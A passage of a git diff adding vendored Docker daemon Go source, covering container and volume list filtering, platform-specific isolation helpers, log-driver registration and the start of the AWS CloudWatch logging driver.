+		t.Fatal("expected links to be populated but is empty")
+	}
+
+	expected := name2 + ":" + alias
+	actual := c1.HostConfig.Links[0]
+	if actual != expected {
+		t.Fatalf("got wrong link value, expected: %q, got: %q", expected, actual)
+	}
+
+	// ensure this is persisted
+	b, err := ioutil.ReadFile(filepath.Join(c1.Root, "hostconfig.json"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	type hc struct {
+		Links []string
+	}
+	var cfg hc
+	if err := json.Unmarshal(b, &cfg); err != nil {
+		t.Fatal(err)
+	}
+
+	if len(cfg.Links) != 1 {
+		t.Fatalf("expected one entry in links, got: %d", len(cfg.Links))
+	}
+	if cfg.Links[0] != expected { // same expected as above
+		t.Fatalf("got wrong link value, expected: %q, got: %q", expected, cfg.Links[0])
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/links_notlinux.go b/vendor/github.com/docker/docker/daemon/links_notlinux.go
new file mode 100644
index 0000000000..12c226cfac
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/links_notlinux.go
@@ -0,0 +1,10 @@
+// +build !linux
+
+package daemon
+
+import "github.com/docker/docker/container"
+
+// sqliteMigration performs the link graph DB migration. No-op on platforms other than Linux
+func (daemon *Daemon) sqliteMigration(_ map[string]*container.Container) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/list.go b/vendor/github.com/docker/docker/daemon/list.go
new file mode 100644
index 0000000000..02805ea62b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/list.go
@@ -0,0 +1,660 @@
+package daemon
+
+import (
+	"errors"
+	"fmt"
+	"sort"
+	"strconv"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	networktypes "github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/volume"
+	"github.com/docker/go-connections/nat"
+)
+
+var acceptedVolumeFilterTags = map[string]bool{
+	"dangling": true,
+	"name":     true,
+	"driver":   true,
+	"label":    true,
+}
+
+var acceptedPsFilterTags = map[string]bool{
+	"ancestor":  true,
+	"before":    true,
+	"exited":    true,
+	"id":        true,
+	"isolation": true,
+	"label":     true,
+	"name":      true,
+	"status":    true,
+	"health":    true,
+	"since":     true,
+	"volume":    true,
+	"network":   true,
+	"is-task":   true,
+}
+
+// iterationAction represents possible outcomes happening during the container iteration.
+type iterationAction int
+
+// containerReducer represents a reducer for a container.
+// Returns the object to serialize by the api.
+type containerReducer func(*container.Container, *listContext) (*types.Container, error)
+
+const (
+	// includeContainer is the action to include a container in the reducer.
+	includeContainer iterationAction = iota
+	// excludeContainer is the action to exclude a container in the reducer.
+	excludeContainer
+	// stopIteration is the action to stop iterating over the list of containers.
+	stopIteration
+)
+
+// errStopIteration makes the iterator to stop without returning an error.
+var errStopIteration = errors.New("container list iteration stopped")
+
+// List returns an array of all containers registered in the daemon.
+func (daemon *Daemon) List() []*container.Container {
+	return daemon.containers.List()
+}
+
+// listContext is the daemon generated filtering to iterate over containers.
+// This is created based on the user specification from types.ContainerListOptions.
+type listContext struct {
+	// idx is the container iteration index for this context
+	idx int
+	// ancestorFilter tells whether it should check ancestors or not
+	ancestorFilter bool
+	// names is a list of container names to filter with
+	names map[string][]string
+	// images is a list of images to filter with
+	images map[image.ID]bool
+	// filters is a collection of arguments to filter with, specified by the user
+	filters filters.Args
+	// exitAllowed is a list of exit codes allowed to filter with
+	exitAllowed []int
+
+	// beforeFilter is a filter to ignore containers that appear before the one given
+	beforeFilter *container.Container
+	// sinceFilter is a filter to stop the filtering when the iterator arrive to the given container
+	sinceFilter *container.Container
+
+	// taskFilter tells if we should filter based on wether a container is part of a task
+	taskFilter bool
+	// isTask tells us if the we should filter container that are a task (true) or not (false)
+	isTask bool
+	// ContainerListOptions is the filters set by the user
+	*types.ContainerListOptions
+}
+
+// byContainerCreated is a temporary type used to sort a list of containers by creation time.
+type byContainerCreated []*container.Container
+
+func (r byContainerCreated) Len() int      { return len(r) }
+func (r byContainerCreated) Swap(i, j int) { r[i], r[j] = r[j], r[i] }
+func (r byContainerCreated) Less(i, j int) bool {
+	return r[i].Created.UnixNano() < r[j].Created.UnixNano()
+}
+
+// Containers returns the list of containers to show given the user's filtering.
+func (daemon *Daemon) Containers(config *types.ContainerListOptions) ([]*types.Container, error) {
+	return daemon.reduceContainers(config, daemon.transformContainer)
+}
+
+func (daemon *Daemon) filterByNameIDMatches(ctx *listContext) []*container.Container {
+	idSearch := false
+	names := ctx.filters.Get("name")
+	ids := ctx.filters.Get("id")
+	if len(names)+len(ids) == 0 {
+		// if name or ID filters are not in use, return to
+		// standard behavior of walking the entire container
+		// list from the daemon's in-memory store
+		return daemon.List()
+	}
+
+	// idSearch will determine if we limit name matching to the IDs
+	// matched from any IDs which were specified as filters
+	if len(ids) > 0 {
+		idSearch = true
+	}
+
+	matches := make(map[string]bool)
+	// find ID matches; errors represent "not found" and can be ignored
+	for _, id := range ids {
+		if fullID, err := daemon.idIndex.Get(id); err == nil {
+			matches[fullID] = true
+		}
+	}
+
+	// look for name matches; if ID filtering was used, then limit the
+	// search space to the matches map only; errors represent "not found"
+	// and can be ignored
+	if len(names) > 0 {
+		for id, idNames := range ctx.names {
+			// if ID filters were used and no matches on that ID were
+			// found, continue to next ID in the list
+			if idSearch && !matches[id] {
+				continue
+			}
+			for _, eachName := range idNames {
+				if ctx.filters.Match("name", eachName) {
+					matches[id] = true
+				}
+			}
+		}
+	}
+
+	cntrs := make([]*container.Container, 0, len(matches))
+	for id := range matches {
+		if c := daemon.containers.Get(id); c != nil {
+			cntrs = append(cntrs, c)
+		}
+	}
+
+	// Restore sort-order after filtering
+	// Created gives us nanosec resolution for sorting
+	sort.Sort(sort.Reverse(byContainerCreated(cntrs)))
+
+	return cntrs
+}
+
+// reduceContainers parses the user's filtering options and generates the list of containers to return based on a reducer.
+func (daemon *Daemon) reduceContainers(config *types.ContainerListOptions, reducer containerReducer) ([]*types.Container, error) {
+	var (
+		containers = []*types.Container{}
+	)
+
+	ctx, err := daemon.foldFilter(config)
+	if err != nil {
+		return nil, err
+	}
+
+	// fastpath to only look at a subset of containers if specific name
+	// or ID matches were provided by the user--otherwise we potentially
+	// end up locking and querying many more containers than intended
+	containerList := daemon.filterByNameIDMatches(ctx)
+
+	for _, container := range containerList {
+		t, err := daemon.reducePsContainer(container, ctx, reducer)
+		if err != nil {
+			if err != errStopIteration {
+				return nil, err
+			}
+			break
+		}
+		if t != nil {
+			containers = append(containers, t)
+			ctx.idx++
+		}
+	}
+
+	return containers, nil
+}
+
+// reducePsContainer is the basic representation for a container as expected by the ps command.
+func (daemon *Daemon) reducePsContainer(container *container.Container, ctx *listContext, reducer containerReducer) (*types.Container, error) {
+	container.Lock()
+	defer container.Unlock()
+
+	// filter containers to return
+	action := includeContainerInList(container, ctx)
+	switch action {
+	case excludeContainer:
+		return nil, nil
+	case stopIteration:
+		return nil, errStopIteration
+	}
+
+	// transform internal container struct into api structs
+	return reducer(container, ctx)
+}
+
+// foldFilter generates the container filter based on the user's filtering options.
+func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listContext, error) {
+	psFilters := config.Filters
+
+	if err := psFilters.Validate(acceptedPsFilterTags); err != nil {
+		return nil, err
+	}
+
+	var filtExited []int
+
+	err := psFilters.WalkValues("exited", func(value string) error {
+		code, err := strconv.Atoi(value)
+		if err != nil {
+			return err
+		}
+		filtExited = append(filtExited, code)
+		return nil
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	err = psFilters.WalkValues("status", func(value string) error {
+		if !container.IsValidStateString(value) {
+			return fmt.Errorf("Unrecognised filter value for status: %s", value)
+		}
+
+		config.All = true
+		return nil
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	var taskFilter, isTask bool
+	if psFilters.Include("is-task") {
+		if psFilters.ExactMatch("is-task", "true") {
+			taskFilter = true
+			isTask = true
+		} else if psFilters.ExactMatch("is-task", "false") {
+			taskFilter = true
+			isTask = false
+		} else {
+			return nil, fmt.Errorf("Invalid filter 'is-task=%s'", psFilters.Get("is-task"))
+		}
+	}
+
+	err = psFilters.WalkValues("health", func(value string) error {
+		if !container.IsValidHealthString(value) {
+			return fmt.Errorf("Unrecognised filter value for health: %s", value)
+		}
+
+		return nil
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	var beforeContFilter, sinceContFilter *container.Container
+
+	err = psFilters.WalkValues("before", func(value string) error {
+		beforeContFilter, err = daemon.GetContainer(value)
+		return err
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	err = psFilters.WalkValues("since", func(value string) error {
+		sinceContFilter, err = daemon.GetContainer(value)
+		return err
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	imagesFilter := map[image.ID]bool{}
+	var ancestorFilter bool
+	if psFilters.Include("ancestor") {
+		ancestorFilter = true
+		psFilters.WalkValues("ancestor", func(ancestor string) error {
+			id, err := daemon.GetImageID(ancestor)
+			if err != nil {
+				logrus.Warnf("Error while looking up for image %v", ancestor)
+				return nil
+			}
+			if imagesFilter[id] {
+				// Already seen this ancestor, skip it
+				return nil
+			}
+			// Then walk down the graph and put the imageIds in imagesFilter
+			populateImageFilterByParents(imagesFilter, id, daemon.imageStore.Children)
+			return nil
+		})
+	}
+
+	return &listContext{
+		filters:              psFilters,
+		ancestorFilter:       ancestorFilter,
+		images:               imagesFilter,
+		exitAllowed:          filtExited,
+		beforeFilter:         beforeContFilter,
+		sinceFilter:          sinceContFilter,
+		taskFilter:           taskFilter,
+		isTask:               isTask,
+		ContainerListOptions: config,
+		names:                daemon.nameIndex.GetAll(),
+	}, nil
+}
+
+// includeContainerInList decides whether a container should be included in the output or not based in the filter.
+// It also decides if the iteration should be stopped or not.
+func includeContainerInList(container *container.Container, ctx *listContext) iterationAction {
+	// Do not include container if it's in the list before the filter container.
+	// Set the filter container to nil to include the rest of containers after this one.
+	if ctx.beforeFilter != nil {
+		if container.ID == ctx.beforeFilter.ID {
+			ctx.beforeFilter = nil
+		}
+		return excludeContainer
+	}
+
+	// Stop iteration when the container arrives to the filter container
+	if ctx.sinceFilter != nil {
+		if container.ID == ctx.sinceFilter.ID {
+			return stopIteration
+		}
+	}
+
+	// Do not include container if it's stopped and we're not filters
+	if !container.Running && !ctx.All && ctx.Limit <= 0 {
+		return excludeContainer
+	}
+
+	// Do not include container if the name doesn't match
+	if !ctx.filters.Match("name", container.Name) {
+		return excludeContainer
+	}
+
+	// Do not include container if the id doesn't match
+	if !ctx.filters.Match("id", container.ID) {
+		return excludeContainer
+	}
+
+	if ctx.taskFilter {
+		if ctx.isTask != container.Managed {
+			return excludeContainer
+		}
+	}
+
+	// Do not include container if any of the labels don't match
+	if !ctx.filters.MatchKVList("label", container.Config.Labels) {
+		return excludeContainer
+	}
+
+	// Do not include container if isolation doesn't match
+	if excludeContainer == excludeByIsolation(container, ctx) {
+		return excludeContainer
+	}
+
+	// Stop iteration when the index is over the limit
+	if ctx.Limit > 0 && ctx.idx == ctx.Limit {
+		return stopIteration
+	}
+
+	// Do not include container if its exit code is not in the filter
+	if len(ctx.exitAllowed) > 0 {
+		shouldSkip := true
+		for _, code := range ctx.exitAllowed {
+			if code == container.ExitCode() && !container.Running && !container.StartedAt.IsZero() {
+				shouldSkip = false
+				break
+			}
+		}
+		if shouldSkip {
+			return excludeContainer
+		}
+	}
+
+	// Do not include container if its status doesn't match the filter
+	if !ctx.filters.Match("status", container.State.StateString()) {
+		return excludeContainer
+	}
+
+	// Do not include container if its health doesn't match the filter
+	if !ctx.filters.ExactMatch("health", container.State.HealthString()) {
+		return excludeContainer
+	}
+
+	if ctx.filters.Include("volume") {
+		volumesByName := make(map[string]*volume.MountPoint)
+		for _, m := range container.MountPoints {
+			if m.Name != "" {
+				volumesByName[m.Name] = m
+			} else {
+				volumesByName[m.Source] = m
+			}
+		}
+
+		volumeExist := fmt.Errorf("volume mounted in container")
+		err := ctx.filters.WalkValues("volume", func(value string) error {
+			if _, exist := container.MountPoints[value]; exist {
+				return volumeExist
+			}
+			if _, exist := volumesByName[value]; exist {
+				return volumeExist
+			}
+			return nil
+		})
+		if err != volumeExist {
+			return excludeContainer
+		}
+	}
+
+	if ctx.ancestorFilter {
+		if len(ctx.images) == 0 {
+			return excludeContainer
+		}
+		if !ctx.images[container.ImageID] {
+			return excludeContainer
+		}
+	}
+
+	networkExist := fmt.Errorf("container part of network")
+	if ctx.filters.Include("network") {
+		err := ctx.filters.WalkValues("network", func(value string) error {
+			if _, ok := container.NetworkSettings.Networks[value]; ok {
+				return networkExist
+			}
+			for _, nw := range container.NetworkSettings.Networks {
+				if nw.EndpointSettings == nil {
+					continue
+				}
+				if nw.NetworkID == value {
+					return networkExist
+				}
+			}
+			return nil
+		})
+		if err != networkExist {
+			return excludeContainer
+		}
+	}
+
+	return includeContainer
+}
+
+// transformContainer generates the container type expected by the docker ps command.
+func (daemon *Daemon) transformContainer(container *container.Container, ctx *listContext) (*types.Container, error) {
+	newC := &types.Container{
+		ID:      container.ID,
+		Names:   ctx.names[container.ID],
+		ImageID: container.ImageID.String(),
+	}
+	if newC.Names == nil {
+		// Dead containers will often have no name, so make sure the response isn't null
+		newC.Names = []string{}
+	}
+
+	image := container.Config.Image // if possible keep the original ref
+	if image != container.ImageID.String() {
+		id, err := daemon.GetImageID(image)
+		if _, isDNE := err.(ErrImageDoesNotExist); err != nil && !isDNE {
+			return nil, err
+		}
+		if err != nil || id != container.ImageID {
+			image = container.ImageID.String()
+		}
+	}
+	newC.Image = image
+
+	if len(container.Args) > 0 {
+		args := []string{}
+		for _, arg := range container.Args {
+			if strings.Contains(arg, " ") {
+				args = append(args, fmt.Sprintf("'%s'", arg))
+			} else {
+				args = append(args, arg)
+			}
+		}
+		argsAsString := strings.Join(args, " ")
+
+		newC.Command = fmt.Sprintf("%s %s", container.Path, argsAsString)
+	} else {
+		newC.Command = container.Path
+	}
+	newC.Created = container.Created.Unix()
+	newC.State = container.State.StateString()
+	newC.Status = container.State.String()
+	newC.HostConfig.NetworkMode = string(container.HostConfig.NetworkMode)
+	// copy networks to avoid races
+	networks := make(map[string]*networktypes.EndpointSettings)
+	for name, network := range container.NetworkSettings.Networks {
+		if network == nil || network.EndpointSettings == nil {
+			continue
+		}
+		networks[name] = &networktypes.EndpointSettings{
+			EndpointID:          network.EndpointID,
+			Gateway:             network.Gateway,
+			IPAddress:           network.IPAddress,
+			IPPrefixLen:         network.IPPrefixLen,
+			IPv6Gateway:         network.IPv6Gateway,
+			GlobalIPv6Address:   network.GlobalIPv6Address,
+			GlobalIPv6PrefixLen: network.GlobalIPv6PrefixLen,
+			MacAddress:          network.MacAddress,
+			NetworkID:           network.NetworkID,
+		}
+		if network.IPAMConfig != nil {
+			networks[name].IPAMConfig = &networktypes.EndpointIPAMConfig{
+				IPv4Address: network.IPAMConfig.IPv4Address,
+				IPv6Address: network.IPAMConfig.IPv6Address,
+			}
+		}
+	}
+	newC.NetworkSettings = &types.SummaryNetworkSettings{Networks: networks}
+
+	newC.Ports = []types.Port{}
+	for port, bindings := range container.NetworkSettings.Ports {
+		p, err := nat.ParsePort(port.Port())
+		if err != nil {
+			return nil, err
+		}
+		if len(bindings) == 0 {
+			newC.Ports = append(newC.Ports, types.Port{
+				PrivatePort: uint16(p),
+				Type:        port.Proto(),
+			})
+			continue
+		}
+		for _, binding := range bindings {
+			h, err := nat.ParsePort(binding.HostPort)
+			if err != nil {
+				return nil, err
+			}
+			newC.Ports = append(newC.Ports, types.Port{
+				PrivatePort: uint16(p),
+				PublicPort:  uint16(h),
+				Type:        port.Proto(),
+				IP:          binding.HostIP,
+			})
+		}
+	}
+
+	if ctx.Size {
+		sizeRw, sizeRootFs := daemon.getSize(container)
+		newC.SizeRw = sizeRw
+		newC.SizeRootFs = sizeRootFs
+	}
+	newC.Labels = container.Config.Labels
+	newC.Mounts = addMountPoints(container)
+
+	return newC, nil
+}
+
+// Volumes lists known volumes, using the filter to restrict the range
+// of volumes returned.
+func (daemon *Daemon) Volumes(filter string) ([]*types.Volume, []string, error) {
+	var (
+		volumesOut []*types.Volume
+	)
+	volFilters, err := filters.FromParam(filter)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	if err := volFilters.Validate(acceptedVolumeFilterTags); err != nil {
+		return nil, nil, err
+	}
+
+	volumes, warnings, err := daemon.volumes.List()
+	if err != nil {
+		return nil, nil, err
+	}
+
+	filterVolumes, err := daemon.filterVolumes(volumes, volFilters)
+	if err != nil {
+		return nil, nil, err
+	}
+	for _, v := range filterVolumes {
+		apiV := volumeToAPIType(v)
+		if vv, ok := v.(interface {
+			CachedPath() string
+		}); ok {
+			apiV.Mountpoint = vv.CachedPath()
+		} else {
+			apiV.Mountpoint = v.Path()
+		}
+		volumesOut = append(volumesOut, apiV)
+	}
+	return volumesOut, warnings, nil
+}
+
+// filterVolumes filters volume list according to user specified filter
+// and returns user chosen volumes
+func (daemon *Daemon) filterVolumes(vols []volume.Volume, filter filters.Args) ([]volume.Volume, error) {
+	// if filter is empty, return original volume list
+	if filter.Len() == 0 {
+		return vols, nil
+	}
+
+	var retVols []volume.Volume
+	for _, vol := range vols {
+		if filter.Include("name") {
+			if !filter.Match("name", vol.Name()) {
+				continue
+			}
+		}
+		if filter.Include("driver") {
+			if !filter.Match("driver", vol.DriverName()) {
+				continue
+			}
+		}
+		if filter.Include("label") {
+			v, ok := vol.(volume.DetailedVolume)
+			if !ok {
+				continue
+			}
+			if !filter.MatchKVList("label", v.Labels()) {
+				continue
+			}
+		}
+		retVols = append(retVols, vol)
+	}
+	danglingOnly := false
+	if filter.Include("dangling") {
+		if filter.ExactMatch("dangling", "true") || filter.ExactMatch("dangling", "1") {
+			danglingOnly = true
+		} else if !filter.ExactMatch("dangling", "false") && !filter.ExactMatch("dangling", "0") {
+			return nil, fmt.Errorf("Invalid filter 'dangling=%s'", filter.Get("dangling"))
+		}
+		retVols = daemon.volumes.FilterByUsed(retVols, !danglingOnly)
+	}
+	return retVols, nil
+}
+
+func populateImageFilterByParents(ancestorMap map[image.ID]bool, imageID image.ID, getChildren func(image.ID) []image.ID) {
+	if !ancestorMap[imageID] {
+		for _, id := range getChildren(imageID) {
+			populateImageFilterByParents(ancestorMap, id, getChildren)
+		}
+		ancestorMap[imageID] = true
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/list_unix.go b/vendor/github.com/docker/docker/daemon/list_unix.go
new file mode 100644
index 0000000000..91c9caccf4
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/list_unix.go
@@ -0,0 +1,11 @@
+// +build linux freebsd solaris
+
+package daemon
+
+import "github.com/docker/docker/container"
+
+// excludeByIsolation is a platform specific helper function to support PS
+// filtering by Isolation. This is a Windows-only concept, so is a no-op on Unix.
+func excludeByIsolation(container *container.Container, ctx *listContext) iterationAction {
+	return includeContainer
+}
diff --git a/vendor/github.com/docker/docker/daemon/list_windows.go b/vendor/github.com/docker/docker/daemon/list_windows.go
new file mode 100644
index 0000000000..7fbcd3af26
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/list_windows.go
@@ -0,0 +1,20 @@
+package daemon
+
+import (
+	"strings"
+
+	"github.com/docker/docker/container"
+)
+
+// excludeByIsolation is a platform specific helper function to support PS
+// filtering by Isolation. This is a Windows-only concept, so is a no-op on Unix.
+func excludeByIsolation(container *container.Container, ctx *listContext) iterationAction {
+	i := strings.ToLower(string(container.HostConfig.Isolation))
+	if i == "" {
+		i = "default"
+	}
+	if !ctx.filters.Match("isolation", i) {
+		return excludeContainer
+	}
+	return includeContainer
+}
diff --git a/vendor/github.com/docker/docker/daemon/logdrivers_linux.go b/vendor/github.com/docker/docker/daemon/logdrivers_linux.go
new file mode 100644
index 0000000000..ad343c1e8e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logdrivers_linux.go
@@ -0,0 +1,15 @@
+package daemon
+
+import (
+	// Importing packages here only to make sure their init gets called and
+	// therefore they register themselves to the logdriver factory.
+	_ "github.com/docker/docker/daemon/logger/awslogs"
+	_ "github.com/docker/docker/daemon/logger/fluentd"
+	_ "github.com/docker/docker/daemon/logger/gcplogs"
+	_ "github.com/docker/docker/daemon/logger/gelf"
+	_ "github.com/docker/docker/daemon/logger/journald"
+	_ "github.com/docker/docker/daemon/logger/jsonfilelog"
+	_ "github.com/docker/docker/daemon/logger/logentries"
+	_ "github.com/docker/docker/daemon/logger/splunk"
+	_ "github.com/docker/docker/daemon/logger/syslog"
+)
diff --git a/vendor/github.com/docker/docker/daemon/logdrivers_windows.go b/vendor/github.com/docker/docker/daemon/logdrivers_windows.go
new file mode 100644
index 0000000000..f3002b97e2
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logdrivers_windows.go
@@ -0,0 +1,13 @@
+package daemon
+
+import (
+	// Importing packages here only to make sure their init gets called and
+	// therefore they register themselves to the logdriver factory.
+	_ "github.com/docker/docker/daemon/logger/awslogs"
+	_ "github.com/docker/docker/daemon/logger/etwlogs"
+	_ "github.com/docker/docker/daemon/logger/fluentd"
+	_ "github.com/docker/docker/daemon/logger/jsonfilelog"
+	_ "github.com/docker/docker/daemon/logger/logentries"
+	_ "github.com/docker/docker/daemon/logger/splunk"
+	_ "github.com/docker/docker/daemon/logger/syslog"
+)
diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go
new file mode 100644
index 0000000000..fee518db4b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go
@@ -0,0 +1,404 @@
+// Package awslogs provides the logdriver for forwarding container logs to Amazon CloudWatch Logs
+package awslogs
+
+import (
+	"errors"
+	"fmt"
+	"os"
+	"runtime"
+	"sort"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/aws/aws-sdk-go/aws"
+	"github.com/aws/aws-sdk-go/aws/awserr"
+	"github.com/aws/aws-sdk-go/aws/ec2metadata"
+	"github.com/aws/aws-sdk-go/aws/request"
+	"github.com/aws/aws-sdk-go/aws/session"
+	"github.com/aws/aws-sdk-go/service/cloudwatchlogs"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/logger/loggerutils"
+	"github.com/docker/docker/dockerversion"
+)
+
+const (
+	name                  = "awslogs"
+	regionKey             = "awslogs-region"
+	regionEnvKey          = "AWS_REGION"
+	logGroupKey           = "awslogs-group"
+	logStreamKey          = "awslogs-stream"
+	tagKey                = "tag"
+	batchPublishFrequency = 5 * time.Second
+
+	// See: http://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html
+	perEventBytes          = 26
+	maximumBytesPerPut     = 1048576
+	maximumLogEventsPerPut = 10000
+
+	// See: http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/cloudwatch_limits.html
+	maximumBytesPerEvent = 262144 - perEventBytes
+
+	resourceAlreadyExistsCode = "ResourceAlreadyExistsException"
+	dataAlreadyAcceptedCode   = "DataAlreadyAcceptedException"
+	invalidSequenceTokenCode  = "InvalidSequenceTokenException"
+
+	userAgentHeader = "User-Agent"
+)
+
+type logStream struct {
+	logStreamName string
+	logGroupName  string
+	client        api
+	messages      chan *logger.Message
+	lock          sync.RWMutex
+	closed        bool
+	sequenceToken *string
+}
+
+type api interface {
+	CreateLogStream(*cloudwatchlogs.CreateLogStreamInput) (*cloudwatchlogs.CreateLogStreamOutput, error)
+	PutLogEvents(*cloudwatchlogs.PutLogEventsInput) (*cloudwatchlogs.PutLogEventsOutput, error)
+}
+
+type regionFinder interface {
+	Region() (string, error)
+}
+
+type wrappedEvent struct {
+	inputLogEvent *cloudwatchlogs.InputLogEvent
+	insertOrder   int
+}
+type byTimestamp []wrappedEvent
+
+// init registers the awslogs driver
+func init() {
+	if err := logger.RegisterLogDriver(name, New); err != nil {
+		logrus.Fatal(err)
+	}
+	if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil {
+		logrus.Fatal(err)
+	}
+}
+
+// New creates an awslogs logger using the configuration passed in on the
+// context.  Supported context configuration variables are awslogs-region,
+// awslogs-group, and awslogs-stream.  When available, configuration is
+// also taken from environment variables AWS_REGION, AWS_ACCESS_KEY_ID,
+// AWS_SECRET_ACCESS_KEY, the shared credentials file (~/.aws/credentials), and
+// the EC2 Instance Metadata Service.
+func New(ctx logger.Context) (logger.Logger, error) {
+	logGroupName := ctx.Config[logGroupKey]
+	logStreamName, err := loggerutils.ParseLogTag(ctx, "{{.FullID}}")
+	if err != nil {
+		return nil, err
+	}
+
+	if ctx.Config[logStreamKey] != "" {
+		logStreamName = ctx.Config[logStreamKey]
+	}
+	client, err := newAWSLogsClient(ctx)
+	if err != nil {
+		return nil, err
+	}
+	containerStream := &logStream{
+		logStreamName: logStreamName,
+		logGroupName:  logGroupName,
+		client:        client,
+		messages:      make(chan *logger.Message, 4096),
+	}
+	err = containerStream.create()
+	if err != nil {
+		return nil, err
+	}
+	go containerStream.collectBatch()
+
+	return containerStream, nil
+}
+
+// newRegionFinder is a variable such that the implementation
+// can be swapped out for unit tests.
+var newRegionFinder = func() regionFinder {
+	return ec2metadata.New(session.New())
+}
+
+// newAWSLogsClient creates the service client for Amazon CloudWatch Logs.
+// Customizations to the default client from the SDK include a Docker-specific
+// User-Agent string and automatic region detection using the EC2 Instance
+// Metadata Service when region is otherwise unspecified.
+func newAWSLogsClient(ctx logger.Context) (api, error) {
+	var region *string
+	if os.Getenv(regionEnvKey) != "" {
+		region = aws.String(os.Getenv(regionEnvKey))
+	}
+	if ctx.Config[regionKey] != "" {
+		region = aws.String(ctx.Config[regionKey])
+	}
+	if region == nil || *region == "" {
+		logrus.Info("Trying to get region from EC2 Metadata")
+		ec2MetadataClient := newRegionFinder()
+		r, err := ec2MetadataClient.Region()
+		if err != nil {
+			logrus.WithFields(logrus.Fields{
+				"error": err,
+			}).Error("Could not get region from EC2 metadata, environment, or log option")
+			return nil, errors.New("Cannot determine region for awslogs driver")
+		}
+		region = &r
+	}
+	logrus.WithFields(logrus.Fields{
+		"region": *region,
+	}).Debug("Created awslogs client")
+
+	client := cloudwatchlogs.New(session.New(), aws.NewConfig().WithRegion(*region))
+
+	client.Handlers.Build.PushBackNamed(request.NamedHandler{
+		Name: "DockerUserAgentHandler",
+		Fn: func(r *request.Request) {
+			currentAgent := r.HTTPRequest.Header.Get(userAgentHeader)
+			r.HTTPRequest.Header.Set(userAgentHeader,
+				fmt.Sprintf("Docker %s (%s) %s",
+					dockerversion.Version, runtime.GOOS, currentAgent))
+		},
+	})
+	return client, nil
+}
+
+// Name returns the name of the awslogs logging driver
+func (l *logStream) Name() string {
+	return name
+}
+
+// Log submits messages for logging by an instance of the awslogs logging driver
+func (l *logStream) Log(msg *logger.Message) error {
+	l.lock.RLock()
+	defer l.lock.RUnlock()
+	if !l.closed {
+		// buffer up the data, making sure to copy the Line data
+		l.messages <- logger.CopyMessage(msg)
+	}
+	return nil
+}
+
+// Close closes the instance of the awslogs logging driver
+func (l *logStream) Close() error {
+	l.lock.Lock()
+	defer l.lock.Unlock()
+	if !l.closed {
+		close(l.messages)
+	}
+	l.closed = true
+	return nil
+}
+
+// create creates a log stream for the instance of the awslogs logging driver
+func (l *logStream) create() error {
+	input := &cloudwatchlogs.CreateLogStreamInput{
+		LogGroupName:  aws.String(l.logGroupName),
+		LogStreamName: aws.String(l.logStreamName),
+	}
+
+	_, err := l.client.CreateLogStream(input)
+
+	if err != nil {
+		if awsErr, ok := err.(awserr.Error); ok {
+			fields := logrus.Fields{
+				"errorCode":     awsErr.Code(),
+				"message":       awsErr.Message(),
+				"origError":     awsErr.OrigErr(),
+				"logGroupName":  l.logGroupName,
+				"logStreamName": l.logStreamName,
+			}
+			if awsErr.Code() == resourceAlreadyExistsCode {
+				// Allow creation to succeed
+				logrus.WithFields(fields).Info("Log stream already exists")
+				return nil
+			}
+			logrus.WithFields(fields).Error("Failed to create log stream")
+		}
+	}
+	return err
+}
+
+// newTicker is used for time-based batching.  newTicker is a variable such
+// that the implementation can be swapped out for unit tests.
+var newTicker = func(freq time.Duration) *time.Ticker {
+	return time.NewTicker(freq)
+}
+
+// collectBatch executes as a goroutine to perform batching of log events for
+// submission to the log stream.  Batching is performed on time- and size-
+// bases.  Time-based batching occurs at a 5 second interval (defined in the
+// batchPublishFrequency const).  Size-based batching is performed on the
+// maximum number of events per batch (defined in maximumLogEventsPerPut) and
+// the maximum number of total bytes in a batch (defined in
+// maximumBytesPerPut).  Log messages are split by the maximum bytes per event
+// (defined in maximumBytesPerEvent).  There is a fixed per-event byte overhead
+// (defined in perEventBytes) which is accounted for in split- and batch-
+// calculations.
+func (l *logStream) collectBatch() {
+	timer := newTicker(batchPublishFrequency)
+	var events []wrappedEvent
+	bytes := 0
+	for {
+		select {
+		case <-timer.C:
+			l.publishBatch(events)
+			events = events[:0]
+			bytes = 0
+		case msg, more := <-l.messages:
+			if !more {
+				l.publishBatch(events)
+				return
+			}
+			unprocessedLine := msg.Line
+			for len(unprocessedLine) > 0 {
+				// Split line length so it does not exceed the maximum
+				lineBytes := len(unprocessedLine)
+				if lineBytes > maximumBytesPerEvent {
+					lineBytes = maximumBytesPerEvent
+				}
+				line := unprocessedLine[:lineBytes]
+				unprocessedLine = unprocessedLine[lineBytes:]
+				if (len(events) >= maximumLogEventsPerPut) || (bytes+lineBytes+perEventBytes > maximumBytesPerPut) {
+					// Publish an existing batch if it's already over the maximum number of events or if adding this
+					// event would push it over the maximum number of total bytes.
+					l.publishBatch(events)
+					events = events[:0]
+					bytes = 0
+				}
+				events = append(events, wrappedEvent{
